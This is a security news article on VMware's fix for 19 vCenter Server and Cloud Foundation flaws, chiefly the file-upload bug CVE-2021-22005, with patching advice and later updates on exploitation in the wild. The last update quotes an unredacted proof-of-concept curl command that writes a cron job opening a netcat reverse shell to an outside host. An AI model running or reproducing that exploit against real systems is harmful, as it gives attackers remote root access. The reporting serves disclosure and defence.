Plug critical VMware vCenter Server flaw before ransomware gangs start exploiting it (CVE-2021-22005)
VMware has fixed 19 vulnerabilities affecting VMware vCenter Server and VMware Cloud Foundation, the most critical of which is CVE-2021-22005.
“This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” the company noted.
“The ramifications of this vulnerability are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available. With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.”
About VMware vCenter Server and Cloud Foundation
VMware vCenter Server is software that allows administrators to provision, monitor, orchestrate, and control their VMware vSphere deployments (virtual machines) from a centralized location. It can be installed on a Windows machine or a preconfigured Linux version (i.e., the vCenter Server Appliance).
VMware Cloud Foundation is a hybrid cloud platform that provides software-defined services for compute, storage, networking, security and cloud management to run enterprise apps in private or public environments.
About the fixed vulnerabilities
The offered security updates fix 19 vulnerabilities in all, most of which have been reported by George Noseevich and Sergey Gerasimov of SolidLab LLC.
The vulnerabilities affect vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x.
CVE-2021-22005 – the most critical one, with a CVSS score of 9.8 – is an arbitrary file upload vulnerability in the Analytics service, which can be used to execute commands and software on the vCenter Server Appliance. A malicious actor with network access to port 443 on vCenter Server could exploit it by uploading a specially crafted file.
“The other issues have lower CVSS scores but still may be usable to an attacker that is already inside your organization’s network,” the company explained.
These can allow attackers to esclate privileges, access restricted endpoints, manipulate VM network settings, gain access to sensitive information, execute malicious scripts, delete non critical files, and create a denial of service condition.
What to do?
As noted before, VMware urges administrators to consult the advisory, ascertain which version of the solutions they are using, and upgrade to a fixed version as soon as possible.
The only workaround offered is for CVE-2021-22005, the rest of the security holes require a patch to be closed.
“At best, workarounds are temporary solutions to buy a short amount of time until patching can commence. They rely on editing files and changing vSphere in ways that are not intended and might cause serious issues if errors are made. Workarounds also tend to be more challenging for vSphere Admins who do not have deep UNIX experience. Just using UNIX text editors can be a challenge,” the company explained.
“Patching vCenter Server is much more straightforward, can be done via API or UI, does not introduce human error, does not create other operational concerns, and should already be an established process in an organization.”
Rapid7’s Glenn Thorpe also recommends admins to patch right away.
“While there are currently no reports of exploitation, we expect this to quickly change within days — just as previous critical vCenter vulnerabilities did (CVE-2021-21985, CVE-2021-21972). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet,” he added.
A very thorough Q&A document regarding these vulnerabilities and updates is available here.
UPDATE (September 25, 2021, 02:55 a.m. PT):
“On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,” warns the US federal agency.
UPDATE (September 29, 2021, 07:20 a.m. PT):
A working exploit for CVE-2021-22005 is now available and being used by attackers:
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA
— wvu (@wvuuuuuuuuuuuuu) September 27, 2021
The Randori Attack Team has also developed a reliable working exploit but won’t be disclosing it.
“Organizations that have or had affected vCenter versions exposed to the Internet since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,” the team has advised, and has shared indicators of exploitation.